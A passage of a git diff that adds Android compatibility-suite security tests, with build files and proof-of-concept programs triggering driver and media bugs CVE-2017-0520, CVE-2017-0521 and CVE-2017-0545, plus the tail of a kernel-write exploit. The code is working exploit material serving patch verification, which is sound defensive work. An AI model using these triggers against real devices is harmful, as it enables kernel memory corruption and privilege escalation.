+int main(void) {
+ int fd;
+ pthread_t race_car;
+ pthread_t race_car1;
+ pthread_create(&race_car, NULL, do_ipc_stuff, NULL);
+ usleep(50000);
+ fd = get_fd(dev);
+ pthread_create(&race_car1, NULL, leak_ptr, NULL);
+ usleep(1000);
+ leak_heap_ptr(fd);
+ arb_kernel_write_send_tzcmd(fd);
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0520/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0520/Android.mk
new file mode 100644
index 0000000..2a9b85c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0520/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0520
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0520/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0520/poc.c
new file mode 100644
index 0000000..756c50c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0520/poc.c
@@ -0,0 +1,112 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <dirent.h>
+#include <dlfcn.h>
+#include <fcntl.h>
+#include <linux/sched.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/resource.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include <unistd.h>
+
+void trigger_bug(void);
+int open_driver(void);
+
+struct buf_info {
+ union {
+ uint32_t offset;
+ uint8_t *vaddr;
+ };
+ uint32_t len;
+};
+
+enum qcedev_sha_alg_enum {
+ QCEDEV_ALG_SHA1 = 0,
+ QCEDEV_ALG_SHA256 = 1,
+ QCEDEV_ALG_SHA1_HMAC = 2,
+ QCEDEV_ALG_SHA256_HMAC = 3,
+ QCEDEV_ALG_AES_CMAC = 4,
+ QCEDEV_ALG_SHA_ALG_LAST
+};
+#define QCEDEV_MAX_BUFFERS 16
+#define QCEDEV_MAX_SHA_DIGEST 32
+struct qcedev_sha_op_req {
+ struct buf_info data[QCEDEV_MAX_BUFFERS];
+ uint32_t entries;
+ uint32_t data_len;
+ uint8_t digest[QCEDEV_MAX_SHA_DIGEST];
+ uint32_t diglen;
+ uint8_t *authkey;
+ uint32_t authklen;
+ enum qcedev_sha_alg_enum alg;
+};
+
+#define QCEDEV_IOC_MAGIC 0x87
+#define QCEDEV_IOCTL_SHA_UPDATE_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 4, struct qcedev_sha_op_req)
+#define QCEDEV_IOCTL_SHA_INIT_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 3, struct qcedev_sha_op_req)
+
+int g_fd = -1;
+
+int open_driver() {
+ char *dev_path = (char *)"/dev/qce";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+void trigger_bug() {
+ struct qcedev_sha_op_req req;
+
+ req.entries = 1;
+ req.data_len = 0x4000;
+
+ unsigned long *vaddr = (unsigned long *)malloc(0x1000);
+ vaddr[0] = 0;
+ vaddr[1] = (unsigned long)0xffffffffffffffff;
+ req.data[0].len = 0x4000;
+ req.data[0].vaddr = 0;
+
+ req.diglen = 0x1000;
+ req.authklen = 16;
+ req.authkey = (uint8_t *)"111111111111111";
+ req.alg = QCEDEV_ALG_AES_CMAC;
+
+ ioctl(g_fd, QCEDEV_IOCTL_SHA_UPDATE_REQ, &req);
+}
+
+int main(int argc, char **argv) {
+ setpriority(PRIO_PROCESS, gettid(), -19);
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ trigger_bug();
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0521/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0521/Android.mk
new file mode 100644
index 0000000..c61f95f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0521/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0521
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0521/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0521/poc.c
new file mode 100644
index 0000000..11a3e94a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0521/poc.c
@@ -0,0 +1,392 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/wait.h>
+#include <fcntl.h>
+#include <linux/ion.h>
+#include <linux/types.h>
+#include <linux/videodev2.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define MAX_PLANES VIDEO_MAX_PLANES
+
+#define PARTIAL_FRAME_STRIPE_COUNT 4
+
+#define MAX_NUM_CPP_STRIPS 8
+#define MSM_CPP_MAX_NUM_PLANES 3
+#define MSM_CPP_MIN_FRAME_LENGTH 13
+#define MSM_CPP_MAX_FRAME_LENGTH 4096
+#define MSM_CPP_MAX_FW_NAME_LEN 32
+#define MAX_FREQ_TBL 10
+
+enum msm_cpp_frame_type {
+ MSM_CPP_OFFLINE_FRAME,
+ MSM_CPP_REALTIME_FRAME,
+};
+
+enum msm_vpe_frame_type {
+ MSM_VPE_OFFLINE_FRAME,
+ MSM_VPE_REALTIME_FRAME,
+};
+
+struct msm_cpp_buffer_info_t {
+ int32_t fd;
+ uint32_t index;
+ uint32_t offset;
+ uint8_t native_buff;
+ uint8_t processed_divert;
+ uint32_t identity;
+};
+
+struct msm_cpp_stream_buff_info_t {
+ uint32_t identity;
+ uint32_t num_buffs;
+ struct msm_cpp_buffer_info_t *buffer_info;
+};
+
+enum msm_cpp_batch_mode_t {
+ BATCH_MODE_NONE,
+ BATCH_MODE_VIDEO,
+ BATCH_MODE_PREVIEW
+};
+
+struct msm_cpp_batch_info_t {
+ enum msm_cpp_batch_mode_t batch_mode;
+ uint32_t batch_size;
+ uint32_t intra_plane_offset[MAX_PLANES];
+ uint32_t pick_preview_idx;
+ uint32_t cont_idx;
+};
+
+struct msm_cpp_frame_info_t {
+ int32_t frame_id;
+ struct timeval timestamp;
+ uint32_t inst_id;
+ uint32_t identity;
+ uint32_t client_id;
+ enum msm_cpp_frame_type frame_type;
+ uint32_t num_strips;
+ uint32_t msg_len;
+ uint32_t *cpp_cmd_msg;
+ int src_fd;
+ int dst_fd;
+ struct timeval in_time, out_time;
+ void __user *cookie;
+ int32_t *status;
+ int32_t duplicate_output;
+ uint32_t duplicate_identity;
+ uint32_t feature_mask;
+ uint8_t we_disable;
+ struct msm_cpp_buffer_info_t input_buffer_info;
+ struct msm_cpp_buffer_info_t output_buffer_info[8];
+ struct msm_cpp_buffer_info_t duplicate_buffer_info;
+ struct msm_cpp_buffer_info_t tnr_scratch_buffer_info[2];
+ uint32_t reserved;
+ uint8_t partial_frame_indicator;
+ uint8_t first_payload;
+ uint8_t last_payload;
+ uint32_t first_stripe_index;
+ uint32_t last_stripe_index;
+ uint32_t stripe_info_offset;
+ uint32_t stripe_info;
+ struct msm_cpp_batch_info_t batch_info;
+};
+
+struct msm_cpp_pop_stream_info_t {
+ int32_t frame_id;
+ uint32_t identity;
+};
+
+struct cpp_hw_info {
+ uint32_t cpp_hw_version;
+ uint32_t cpp_hw_caps;
+ unsigned long freq_tbl[MAX_FREQ_TBL];
+ uint32_t freq_tbl_count;
+};
+
+struct msm_vpe_frame_strip_info {
+ uint32_t src_w;
+ uint32_t src_h;
+ uint32_t dst_w;
+ uint32_t dst_h;
+ uint32_t src_x;
+ uint32_t src_y;
+ uint32_t phase_step_x;
+ uint32_t phase_step_y;
+ uint32_t phase_init_x;
+ uint32_t phase_init_y;
+};
+
+struct msm_vpe_buffer_info_t {
+ int32_t fd;
+ uint32_t index;
+ uint32_t offset;
+ uint8_t native_buff;
+ uint8_t processed_divert;
+};
+
+struct msm_vpe_stream_buff_info_t {
+ uint32_t identity;
+ uint32_t num_buffs;
+ struct msm_vpe_buffer_info_t *buffer_info;
+};
+
+struct msm_vpe_frame_info_t {
+ int32_t frame_id;
+ struct timeval timestamp;
+ uint32_t inst_id;
+ uint32_t identity;
+ uint32_t client_id;
+ enum msm_vpe_frame_type frame_type;
+ struct msm_vpe_frame_strip_info strip_info;
+ unsigned long src_fd;
+ unsigned long dst_fd;
+ struct ion_handle *src_ion_handle;
+ struct ion_handle *dest_ion_handle;
+ unsigned long src_phyaddr;
+ unsigned long dest_phyaddr;
+ unsigned long src_chroma_plane_offset;
+ unsigned long dest_chroma_plane_offset;
+ struct timeval in_time, out_time;
+ void *cookie;
+
+ struct msm_vpe_buffer_info_t input_buffer_info;
+ struct msm_vpe_buffer_info_t output_buffer_info;
+};
+
+enum msm_camera_buf_mngr_buf_type {
+ MSM_CAMERA_BUF_MNGR_BUF_PLANAR,
+ MSM_CAMERA_BUF_MNGR_BUF_USER,
+ MSM_CAMERA_BUF_MNGR_BUF_INVALID,
+};
+
+#define MSM_CAMERA_MAX_USER_BUFF_CNT 16
+struct msm_camera_user_buf_cont_t {
+ unsigned int buf_cnt;
+ unsigned int buf_idx[MSM_CAMERA_MAX_USER_BUFF_CNT];
+};
+
+struct msm_buf_mngr_info {
+ uint32_t session_id;
+ uint32_t stream_id;
+ uint32_t frame_id;
+ struct timeval timestamp;
+ uint32_t index;
+ uint32_t reserved;
+ enum msm_camera_buf_mngr_buf_type type;
+ struct msm_camera_user_buf_cont_t user_buf;
+};
+
+struct msm_pproc_queue_buf_info {
+ struct msm_buf_mngr_info buff_mgr_info;
+ uint8_t is_buf_dirty;
+};
+
+struct msm_cpp_clock_settings_t {
+ unsigned long clock_rate;
+ uint64_t avg;
+ uint64_t inst;
+};
+
+#define VIDIOC_MSM_CPP_CFG \
+ _IOWR('V', BASE_VIDIOC_PRIVATE, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_GET_EVENTPAYLOAD \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 1, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_GET_INST_INFO \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 2, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_LOAD_FIRMWARE \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 3, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_GET_HW_INFO \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 4, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_FLUSH_QUEUE \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 5, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_ENQUEUE_STREAM_BUFF_INFO \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 6, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_DEQUEUE_STREAM_BUFF_INFO \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 7, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_VPE_CFG \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 8, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_VPE_TRANSACTION_SETUP \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 9, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_VPE_GET_EVENTPAYLOAD \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 10, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_VPE_GET_INST_INFO \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 11, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_VPE_ENQUEUE_STREAM_BUFF_INFO \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 12, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_VPE_DEQUEUE_STREAM_BUFF_INFO \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 13, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_QUEUE_BUF \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 14, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_APPEND_STREAM_BUFF_INFO \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 15, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_SET_CLOCK \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 16, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_POP_STREAM_BUFFER \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 17, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_IOMMU_ATTACH \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 18, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_IOMMU_DETACH \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 19, struct msm_camera_v4l2_ioctl_t)
+
+#define VIDIOC_MSM_CPP_DELETE_STREAM_BUFF \
+ _IOWR('V', BASE_VIDIOC_PRIVATE + 20, struct msm_camera_v4l2_ioctl_t)
+
+#define BASE_VIDIOC_PRIVATE 192 /* 192-255 are private */
+
+#define V4L2_EVENT_CPP_FRAME_DONE (V4L2_EVENT_PRIVATE_START + 0)
+#define V4L2_EVENT_VPE_FRAME_DONE (V4L2_EVENT_PRIVATE_START + 1)
+
+struct msm_camera_v4l2_ioctl_t {
+ uint32_t id;
+ size_t len;
+ int32_t trans_code;
+ void __user *ioctl_ptr;
+};
+
+#define MSM_CPP_MSG_ID_TRAILER 0xABCDEFAA
+
+int ion_open(void);
+int ion_alloc(int fd, size_t len, size_t align, unsigned int heap_mask,
+ unsigned int flags, ion_user_handle_t *handle);
+
+int ion_open() {
+ int fd = open("/dev/ion", O_RDONLY);
+ return fd;
+}
+
+static int ion_ioctl(int fd, int req, void *arg) {
+ int ret = ioctl(fd, req, arg);
+ return ret;
+}
+
+int ion_alloc(int fd, size_t len, size_t align, unsigned int heap_mask,
+ unsigned int flags, ion_user_handle_t *handle) {
+ int ret;
+ struct ion_allocation_data data = {
+ .len = len,
+ .align = align,
+ .heap_id_mask = heap_mask,
+ .flags = flags,
+ };
+ if (handle == NULL) return -1;
+
+ ret = ion_ioctl(fd, ION_IOC_ALLOC, &data);
+ if (ret < 0) return ret;
+
+ *handle = data.handle;
+
+ return ret;
+}
+
+static void ion_get_fd(int fd, ion_user_handle_t *handle, int *buf_fd) {
+ union {
+ struct ion_fd_data fd;
+ struct ion_allocation_data allocation;
+ struct ion_handle_data handle;
+ struct ion_custom_data custom;
+ } data;
+ memset(&data, 0, sizeof(data));
+ data.handle.handle = *handle;
+ int ret = ioctl(fd, ION_IOC_SHARE, &data);
+ *buf_fd = data.fd.fd;
+}
+
+int main(int argc, char **argv) {
+ int fd;
+ int ion_fd;
+ int buf_fd = -1;
+ const size_t frame_size = 446;
+ ion_user_handle_t ion_handle;
+ uint32_t buf[frame_size];
+ struct msm_camera_v4l2_ioctl_t request = {0, 0, 0, 0};
+ struct msm_cpp_frame_info_t frame_info;
+ struct msm_cpp_buffer_info_t buff_info;
+ struct msm_cpp_stream_buff_info_t stream_buff_info;
+
+ memset(&buf, 0x00, sizeof(buf));
+ memset(&frame_info, 0x01, sizeof(frame_info));
+ memset(&buff_info, 0x00, sizeof(buff_info));
+ memset(&stream_buff_info, 0x00, sizeof(stream_buff_info));
+
+ ion_fd = ion_open();
+
+ ion_alloc(ion_fd, 0x1000, 0, 0xfffffff,
+ ION_FLAG_CACHED | ION_FLAG_CACHED_NEEDS_SYNC, &ion_handle);
+
+ ion_get_fd(ion_fd, &ion_handle, &buf_fd);
+
+ stream_buff_info.num_buffs = 1;
+ stream_buff_info.identity = 0x27BC86AA;
+ stream_buff_info.buffer_info = &buff_info;
+ frame_info.identity = stream_buff_info.identity;
+ buff_info.fd = buf_fd;
+ buff_info.identity = 0x27BC86AA;
+ buff_info.index = 0;
+ buff_info.native_buff = 1;
+ buf[frame_size - 1] = MSM_CPP_MSG_ID_TRAILER;
+ frame_info.msg_len = frame_size;
+ frame_info.cpp_cmd_msg = buf;
+ frame_info.num_strips = UINT_MAX;
+ frame_info.we_disable = 1;
+ frame_info.duplicate_output = 0;
+ frame_info.feature_mask = 0;
+ frame_info.input_buffer_info = buff_info;
+
+ char subdev[32] = {0};
+ for (int i = 0; i < 32; i++) {
+ snprintf(subdev, sizeof(subdev), "/dev/v4l-subdev%d", i);
+ fd = open(subdev, O_RDWR);
+ if (fd < 0) continue;
+
+ request.len = sizeof(stream_buff_info);
+ request.ioctl_ptr = &stream_buff_info;
+ ioctl(fd, VIDIOC_MSM_CPP_ENQUEUE_STREAM_BUFF_INFO, &request);
+
+ ioctl(fd, VIDIOC_MSM_CPP_IOMMU_ATTACH, &request);
+
+ request.len = sizeof(frame_info);
+ request.ioctl_ptr = &frame_info;
+ ioctl(fd, VIDIOC_MSM_CPP_CFG, &request);
+ close(fd);
+ }
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0545/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0545/Android.mk
new file mode 100644
index 0000000..bb9a223
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0545/Android.mk
@@ -0,0 +1,40 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0545
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES := system/media/audio_effects/include \
+ frameworks/native/include
+LOCAL_SHARED_LIBRARIES := libmedia libaudioclient libutils libbinder liblog
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0545/poc.cpp b/hostsidetests/security/securityPatch/CVE-2017-0545/poc.cpp
new file mode 100644
index 0000000..28c3f75
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0545/poc.cpp
@@ -0,0 +1,189 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <audio_effects/effect_visualizer.h>
+#include <binder/IServiceManager.h>
+#include <hardware/audio_effect.h>
+#include <media/AudioEffect.h>
+#include <media/IAudioFlinger.h>
+#include <media/IEffect.h>
+#include <media/IEffectClient.h>
+
+using namespace android;
+
+struct EffectClient : public BnEffectClient {
+ EffectClient() {}
+ virtual void controlStatusChanged(bool controlGranted __unused) {}
+ virtual void enableStatusChanged(bool enabled __unused) {}
+ virtual void commandExecuted(uint32_t cmdCode __unused,
+ uint32_t cmdSize __unused,
+ void *pCmdData __unused,
+ uint32_t replySize __unused,
+ void *pReplyData __unused) {}
+};
+
+static sp<IBinder> createEffect(effect_descriptor_t *pDesc,
+ const sp<IEffectClient> &client,
+ int32_t priority, audio_io_handle_t output,
+ audio_session_t sessionId,
+ const String16 &opPackageName, status_t *status,
+ int *id, int *enabled) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> binder = sm->getService(String16("media.audio_flinger"));
+
+ if (binder.get() == NULL) {
+ return NULL;
+ }
+
+ Parcel data, reply;
+ sp<IBinder> effect;
+
+ if (pDesc == NULL) {
+ return effect;
+ if (status != NULL) {
+ *status = BAD_VALUE;
+ }
+ }
+
+ data.writeInterfaceToken(String16("android.media.IAudioFlinger"));
+ data.write(pDesc, sizeof(effect_descriptor_t));
+ data.writeStrongBinder(IInterface::asBinder(client));
+ data.writeInt32(priority);
+ data.writeInt32((int32_t)output);
+ data.writeInt32(sessionId);
+ data.writeString16(opPackageName);
+
+ status_t lStatus = binder->transact(40 /*CREATE_EFFECT*/, data, &reply);
+ if (lStatus == NO_ERROR) {
+ lStatus = reply.readInt32();
+ int tmp = reply.readInt32();
+ if (id != NULL) {
+ *id = tmp;
+ }
+ tmp = reply.readInt32();
+ if (enabled != NULL) {
+ *enabled = tmp;
+ }
+ effect = reply.readStrongBinder();
+ reply.read(pDesc, sizeof(effect_descriptor_t));
+ }
+ if (status != NULL) {
+ *status = lStatus;
+ }
+
+ return effect;
+}
+
+static status_t command(sp<IBinder> binder, uint32_t cmdCode, uint32_t cmdSize,
+ void *pCmdData, uint32_t *pReplySize,
+ void *pReplyData) {
+ Parcel data, reply;
+ data.writeInterfaceToken(String16("android.media.IEffect"));
+ data.writeInt32(cmdCode);
+ int size = cmdSize;
+ if (pCmdData == NULL) {
+ size = 0;
+ }
+ data.writeInt32(size);
+ if (size) {
+ data.write(pCmdData, size);
+ }
+ if (pReplySize == NULL) {
+ size = 0;
+ } else {
+ size = *pReplySize;
+ }
+ data.writeInt32(size);
+
+ status_t status = binder->transact(3 /*COMMAND*/, data, &reply);
+ if (status == NO_ERROR) {
+ status = reply.readInt32();
+ }
+ if (status != NO_ERROR) {
+ if (pReplySize != NULL) *pReplySize = 0;
+ ALOGI("command status: %d", status);
+ return status;
+ }
+
+ size = reply.readInt32();
+ if (size != 0 && pReplyData != NULL && pReplySize != NULL) {
+ reply.read(pReplyData, size);
+ *pReplySize = size;
+ }
+ return status;
+}
+
+#define FIVEBAND_NUMBANDS 5
+#define MAX_NUM_BANDS 5
+#define MAX_CALL_SIZE 256
+#define LVM_MAX_SESSIONS 32
+#define LVM_UNUSED_SESSION INT_MAX
+#define BASS_BOOST_CUP_LOAD_ARM9E 150 // Expressed in 0.1 MIPS
+#define VIRTUALIZER_CUP_LOAD_ARM9E 120 // Expressed in 0.1 MIPS
+#define EQUALIZER_CUP_LOAD_ARM9E 220 // Expressed in 0.1 MIPS
+#define VOLUME_CUP_LOAD_ARM9E 0 // Expressed in 0.1 MIPS
+#define BUNDLE_MEM_USAGE 25 // Expressed in kB
+static effect_descriptor_t gVirtualizerDescriptor = {
+ {0x37cc2c00, 0xdddd, 0x11db, 0x8577, {0x00, 0x02, 0xa5, 0xd5, 0xc5, 0x1b}},
+ {0x1d4033c0, 0x8557, 0x11df, 0x9f2d, {0x00, 0x02, 0xa5, 0xd5, 0xc5, 0x1b}},
+ EFFECT_CONTROL_API_VERSION,
+ (EFFECT_FLAG_TYPE_INSERT | EFFECT_FLAG_INSERT_LAST |
+ EFFECT_FLAG_DEVICE_IND | EFFECT_FLAG_VOLUME_CTRL),
+ VIRTUALIZER_CUP_LOAD_ARM9E,
+ BUNDLE_MEM_USAGE,
+ "Virtualizer",
+ "NXP Software Ltd.",
+};
+
+int main() {
+ sp<EffectClient> effectClient(new EffectClient());
+
+ const int32_t priority = 0;
+ audio_session_t sessionId = AUDIO_SESSION_OUTPUT_MIX;
+ const audio_io_handle_t io = AUDIO_IO_HANDLE_NONE;
+ const String16 opPackageName("com.exp.poc");
+ int32_t id;
+ int enabled;
+ status_t err;
+
+ sp<IBinder> effect =
+ createEffect(&gVirtualizerDescriptor, effectClient, priority, io,
+ sessionId, opPackageName, &err, &id, &enabled);
+ if (effect == NULL || err != NO_ERROR) {
+ return 0;
+ }
+
+ uint32_t cmdCode, cmdSize, replySize;
+ void *pCmdData, *pReplyData;
+
+ effect_param_t *param;
+ param =
+ (effect_param_t *)malloc(sizeof(effect_param_t) + sizeof(uint32_t) * 3);
+ param->psize = sizeof(uint32_t) * 3;
+ param->vsize = 12;
+ *((uint32_t *)param->data) = 2; // VIRTUALIZER_PARAM_VIRTUAL_SPEAKER_ANGLES
+ *((uint32_t *)param->data + 1) = 1; // nbChannels
+ *((uint32_t *)param->data + 2) = 4; // deviceType
+
+ cmdCode = EFFECT_CMD_GET_PARAM;
+ cmdSize = sizeof(effect_param_t) + sizeof(uint32_t) * 3;
+ pCmdData = param;
